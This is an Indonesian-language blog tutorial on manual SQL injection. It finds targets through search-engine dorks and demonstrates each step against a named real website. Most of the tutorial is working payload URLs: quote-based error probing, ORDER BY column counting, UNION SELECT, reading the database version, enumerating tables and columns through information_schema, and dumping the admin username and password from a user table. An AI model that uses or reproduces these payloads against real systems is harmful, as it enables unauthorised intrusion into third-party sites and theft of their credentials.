Sedikit Info Seputar
Tutorial Hacking SQL Injection Manual Lengkap
Terbaru 2017
- Hay gaes kali ini team Gudang Android, kali ini akan membahas artikel dengan judul Tutorial Hacking SQL Injection Manual Lengkap, kami selaku Team Gudang Android telah mempersiapkan artikel ini untuk sobat sobat yang menyukai Gudang Android. semoga isi postingan tentang
Artikel Hacking, yang saya posting kali ini dapat dipahami dengan mudah serta memberi manfa'at bagi kalian semua, walaupun tidak sempurna setidaknya artikel kami memberi sedikit informasi kepada kalian semua. ok langsung simak aja sob
Judul:
Berbagi Info Seputar
Tutorial Hacking SQL Injection Manual Lengkap
Terbaru
link: Tutorial Hacking SQL Injection Manual Lengkap
Berbagi Tutorial Hacking SQL Injection Manual Lengkap Terbaru dan Terlengkap 2017
BlogSimple! - APa itu SQL Injection? (Structure Query Language Injection) merupakan suatu celah keamanan website dimana seorang attacker dapat memasukan perintah SQL untuk dieksekusi oleh database, penyebabnya utama celah ini adalah variable yang kurang di filter.
Bahan-bahan :
Hackbar (Jika diperlukan)
Internet browser
Dork SQL Injection
Tutorial :
1. Cari target menggunakan dork SQL injection di search engine dan saya anggap anda telah mendapatkan target dan lanjut ke step selanjutnya
2. Disini saya telah mendapatkan target http://gafabaca.com/peta.php?kdCabang=20
3. Lalu saya menambahkan string ' dibelakang /peta.php?kdCabang=20 jadinya seperti ini http://gafabaca.com/peta.php?kdCabang=20
dan muncul pesan error. Disini pesan errornya "You have error on your SQL Syntax bla bla bla bla.." Berarti web ini mempunyai celah SQL Injection.
4. Lalu kita coba mencari dan menghitung jumlah table yang ada didalam DB (Database) tersebut dengan memasukan perintah order by 1-- dan seterusnya sampai muncul error
http://gafabaca.com/peta.php?kdCabang=20 order by 1-- tampilan normal
http://gafabaca.com/peta.php?kdCabang=20 order by 2-- tampilan normal
http://gafabaca.com/peta.php?kdCabang=20 order by 3-- tampilan normal
http://gafabaca.com/peta.php?kdCabang=20 order by 4-- tampilan normal
http://gafabaca.com/peta.php?kdCabang=20 order by 5-- tampilan normal
Saya skip karena terlalu banyak jadi langsung 13
http://gafabaca.com/peta.php?kdCabang=20 order by 13-- tampilan error
Nah kita dapatkan error di http://gafabaca.com/peta.php?kdCabang=20 order by 13--
Berarti jumlah databasenya ada 12
5. Lalu kita akan mengeluarkan angka ajaib dengan memasukan perintah UNION SELECT. Karena tadi errornya di nomor 13 berarti UNION SELECT cukup sampai 12 saja. Seperti ini http://gafabaca.com/peta.php?kdCabang=-20 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- dan disini muncul angka ajaib 3
6. Kalo udah dapet angka ajaibnya kita masukan perintah @@version untuk mencri versi database yang dipakai http://gafabaca.com/peta.php?kdCabang=-20 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12-- lalu muncul versi database yang dipakai web tersebut. Disini memakai versi 5.1.73.1
7. Kita lanjutkan, kita akan "uwik-uwik" databasenya dengan membuka database tabel dengan perintah group_concat(table_name) dan from information_schema.tables where table_schema=database()-- .Jadi akan seperti ini http://gafabaca.com/peta.php?kdCabang=-20 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()-- dan tara akan muncul table databasenya
8. Setelah berhasil mendapatkan database table kita lanjutkan mencari columnnya dengan perintah group_concat(column_name) dan from information_schema.columns where table_name=CHAR()--
Lalu kita isikan () disamping char dengan nama tabel yang dikonversikan ke decimal disini. Kemudian saya memilih tabel user lalu dikonversikan ke decimal menjadi 117 115 101 114 lalu kita isikan decimal itu di () dan kita pisahkan dengan koma jadinya seperti ini http://gafabaca.com/peta.php?kdCabang=-20 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=CHAR(117, 115, 101, 114)--
9. Nah udah keluar kan. Nah sekarang kita lihat isi kolomnya dengan perintah group_concat(username,0x3a,password), dan from (nama column)-- ,jadinya seperti ini http://gafabaca.com/peta.php?kdCabang=-20 UNION SELECT 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12 from user--
Taraa...! udah dapet user:password adminnya. Mohon situs jangan diacak-acak karena untuk media pembelajaran SQL Injection bagi awam. Mohon dikoreksi jika ada yang salah dengan cara berkomentar dibawah postingan ini.
Sekian, semoga bermanfaat. Terima kasih!
Itulah sedikit Artikel Tutorial Hacking SQL Injection Manual Lengkap terbaru dari kami
Semoga artikel Tutorial Hacking SQL Injection Manual Lengkap yang saya posting kali ini, bisa memberi informasi untuk anda semua yang menyukai Gudang Android. jangan lupa baca juga artikel-artikel lain dari kami.
Terima kasih Anda baru saja membaca Tutorial Hacking SQL Injection Manual Lengkap
